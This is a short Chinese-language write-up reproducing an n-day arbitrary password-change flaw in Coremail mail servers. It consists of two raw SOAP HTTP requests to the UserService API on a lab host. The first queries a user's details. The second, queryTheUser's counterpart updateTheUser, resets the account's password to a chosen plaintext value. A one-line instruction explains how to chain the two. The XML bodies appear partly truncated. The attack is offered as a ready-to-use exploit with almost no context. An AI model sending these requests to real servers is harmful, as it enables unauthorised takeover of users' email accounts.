Coremail nday 任意密码修改复现
Nday 任意密码修改
POST /apiws/services/UserService HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.106/apiws/services
Accept-Encoding: gzip, deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,zh-TW;q=0.6
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: 192.168.0.106
Content-Length: 331
</apiw:queryTheUser>
</soapenv:Body></soapenv:Envelope>
获取用户信息,然后直接复制到下面的请求中,修改密码为明文即可。
POST /apiws/services/UserService HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.106/apiws/services
Accept-Encoding: gzip, deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,zh-TW;q=0.6
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: 192.168.0.106
Content-Length: 431
<soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:apiw="http://coremail.cn/apiws">
{
"loginName":"test@coremail.cn",
"name":"aaaaa1'",
"nick_name":null,
"orgId":null,
"password":"111111",
"status":"0"}
</apiw:updateTheUser>
</soapenv:Body></soapenv:Envelope>
